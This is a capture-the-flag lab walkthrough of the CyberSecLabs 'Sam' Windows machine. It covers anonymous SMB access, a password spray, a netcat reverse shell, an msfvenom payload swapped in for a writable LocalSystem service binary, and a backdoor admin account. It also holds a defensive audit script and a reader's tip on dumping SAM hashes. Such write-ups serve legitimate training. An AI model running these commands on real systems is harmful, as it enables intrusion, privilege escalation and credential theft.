CyberSecLabs "SAM" No Metasploit Version

Sam is another great offering from CyberSecLabs that provides an easy way in with appropriate enumeration, and a more difficult solution relying on more than the regular automated tools.  This machine was a bit humbling as I've become more and more reliant on tools like winPEAS, and Sam reminded me that the answer isn't always found using these tools.  So sit back and relax while we walk through this together, and please enjoy!


From now on I've added my "MayorScan3000" portscanning tool into the equation when I'm kicking off, as folks have been telling me I waste time by not scanning all ports.  So I juiced up my port scanner to run with threading enabled.  Meanwhile I'll still do my basic Nmap Scan as well to grab those immediate results.


nmap -p135,139,445,3389,5985 -A

Nmap doesn't return much information, but we do see that SMB is running on the target, which can give us a good start.  Let's enumerate!


We can begin by inspecting the SMB service using smbclient.

smbclient -L

Running smbclient shows that there are several shares, with "backups" being accessible.  We need to investigate this further.
smbclient \\\\\\backups -U ''

Well this was pretty easy, right?  We've discovered a misconfigured share that allows anonymous access to the C:\. Let's exploit it!


With such unrestricted access to the file system, we should look around.  We can quickly check the Users directory, which shows us the user "jamie."  Additionally we can head to jamie's Desktop and grab the user flag there.

User Flag on Jamie's Desktop

So now that we have a flag and a user name, we need to determine what to do from here.  Since we discovered a username, we can try a password spray against it.  Let's use Crackmapexec for this.

crackmapexec smb -u jamie -p /root/Desktop/passes.txt

Crackmapexec makes quick work of locating a password for the user.  We saw port 5985 open earlier which means we can probably use Evil-WinRM to connect.  Let's do that.
evil-winrm -i -u jamie -p redacted

We are successfully logged in!  We see that we are jamie on the machine, and now we need to get to escalating our privileges.  We can start by launching a Python HTTP server on our attacking machine, pulling our tools over to the target, and running winPEAS first.

powershell -c wget "" -outfile "winPEAS.exe"; C:\Users\jamie\Documents\winPEAS.exe

Keep in mind we are using PowerShell currently and need to provide the entire program path in order to run it.  Unfortunately we aren't able to find any real information about the machine or escalation in winPEAS.  This was the same with PowerUp.ps1 as well.  I started scratching my head for a moment and had to remind myself that there are plenty of ways to manually enumerate privileges, services, etc.  Let's do some of that.
whoami /priv

Our user privileges don't show much that we can take advantage of unfortunately.  We can check for running services next.

services (not a typical way to execute this query)

The above took some trial and error because PowerShell uses "Get-Services" to list the running services, and that wasn't working as expected.  Running services did, however, which revealed the above.  Of note are the monitor1 and monitor2 services.  Unfortunately we cannot do much to gather more information on these from Evil-WinRM, so I decided to move to a reverse shell using Netcat and get out of PowerShell.  This required me to transfer a Netcat.exe binary to the machine first, and then connect back to my Kali machine.
Top - nc -nlvp 5555; Bottom - C:\Users\jamie\Documents\nc.exe 5555 -e cmd.exe; Top - sc qc monitor1

We see that the service is running as LocalSystem, and that it can be started/stopped.  Knowing this, we need to confirm that we can modify the directory holding the service binary and its contents.  We can use icacls for this.

icacls Services

There is a lot going on in the above image, but what matters is that Users has RX and W in the results.  This means that we can read, write, and execute in this directory.  All we need to do then is replace monitor1.exe with a malicious executable and restart the service.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=2246 -f exe > monitor1.exe
We can now move this to the target machine, start another Netcat listener to catch the shell, and start the service.
Left - powershell -c wget "" -outfile "monitor1.exe"; sc stop monitor1; Right - nc -nlvp 2246; Left - sc start monitor1; Right - reverse shell successful
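The sc qc and icacls checks above can be automated across every service on a host, which is how a defender would find a monitor1-style weakness before someone else does. This is an added audit script, not something from the original post or from CyberSecLabs; the function names Get-BroadWriteAccess and Get-ServiceBinaryPath are my own, and it is meant to be run as an ordinary user on the box being audited.

```powershell
# Added audit script (not from the original post): list services whose binary,
# or the directory that holds it, grants write-type rights to broad groups.
# Nothing here is hard-coded to Sam; it reads service definitions from the host.

$BroadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-BroadWriteAccess {
    param([string]$Path)
    # Returns the broad principals holding any write-type Allow ACE on $Path.
    # Unreadable ACLs are skipped rather than aborting the whole sweep.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $BroadPrincipals -contains $_.IdentityReference.Value -and
                       ($_.FileSystemRights -band $WriteRights) } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
}

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Strip quotes and arguments from a service PathName, e.g.
    #   "C:\Services\monitor1.exe" -arg  ->  C:\Services\monitor1.exe
    # Unquoted paths containing spaces are truncated at the first space and
    # therefore skipped below (that is a separate unquoted-path issue).
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
    $dir      = Split-Path -Parent $bin
    $fileHits = Get-BroadWriteAccess $bin
    $dirHits  = Get-BroadWriteAccess $dir
    if ($fileHits -or $dirHits) {
        # RunsAs matters: LocalSystem plus a writable binary/directory is the
        # combination exploited above; a low-privilege service account is less severe.
        [PSCustomObject]@{
            Service      = $_.Name
            RunsAs       = $_.StartName
            Binary       = $bin
            FileWritable = ($fileHits -join ', ')
            DirWritable  = ($dirHits -join ', ')
        }
    }
} | Format-Table -AutoSize
```

On a host configured like Sam, the monitor1 row would report BUILTIN\Users under DirWritable with RunsAs LocalSystem, matching what icacls showed; the fix is to remove the Users write ACE from the service directory or move the binary somewhere only administrators can write.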
A quick whoami shows that we are NT AUTHORITY\SYSTEM.  We can head to the Administrator's Desktop to grab the system flag.
System.txt flag on Administrator's Desktop
We can additionally do some Post-Exploitation to take full control of the machine.  
Right - net user themayor !Password123 /add; net localgroup Administrators themayor /add; Left - xfreerdp /u:themayor /p:'!Password123' /v: RDP Login
A quick check of the server users shows that we are indeed a Server Admin now. 

Final Thoughts

Sam is yet another great offering from CyberSecLabs where you are forced to take a slightly less expected or known path to escalate privileges.  Becoming reliant on automated tools is easy, but Sam reminds us that manual enumeration matters, as does staying curious on an engagement.  I hope that you've all learned something from this guide today, and I look forward to seeing you again soon!


Anonymous said…
Great write-up!
You can also find copies of the SAM and SYSTEM files on the backup share at windows\system32\config; copy these over to Kali and run them through samdump2 to extract usernames and hashes.
